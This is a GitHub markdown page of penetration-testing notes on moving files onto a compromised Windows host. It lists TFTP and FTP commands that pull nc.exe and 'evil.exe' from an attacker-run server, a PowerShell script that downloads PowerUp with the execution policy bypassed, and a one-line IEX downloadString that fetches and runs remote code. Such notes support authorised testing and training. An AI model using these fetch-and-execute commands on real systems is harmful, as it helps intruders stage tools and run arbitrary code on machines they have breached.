Skip to content

Latest commit

 

History

History
82 lines (63 loc) · 1.96 KB

3.7-Windows-File-Transfer.md

File metadata and controls

82 lines (63 loc) · 1.96 KB

Pre-Intrusion phase (Windows)

File Transfer

TFTP

tfpt clients are usually non-interactive, so they could work through an obtained shell (Windows XP and Win 2003 contain tftp client by default)

atftpd --daemon --port 69 /tftp
Windows> tftp -i 192.168.30.45 GET nc.exe

FTP (pyftpdlib client on Kali)

Ftp is generally installed on Windows machines, to make it interactive, use -s option

On Kali install a ftp client and set a username/password

apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21

On Windows

ftp <ip>
> binary
> get exploit.exe

FTP (pureftpd client on Kali)

On Kali

# install ftp client
apt-get install pure-ftpd
# create a group
groupadd ftpgroup
# add a user
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
# Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob).
mkdir /root/ftphome
# Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish).
pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/
# Update the ftp database after adding our new user.
pure-pw mkdb
# change ownership of the specified ftp directory
chown -R ftpuser:ftpgroup /root/ftphome
# restart Pure-FTPD
/etc/init.d/pure-ftpd restart

On Windows

echo open <ip> 21> ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

Powershell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://<ip>/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

download file

powershell "IEX(New Object Net.WebClient).downloadString('http://<ip>/file.ps1')"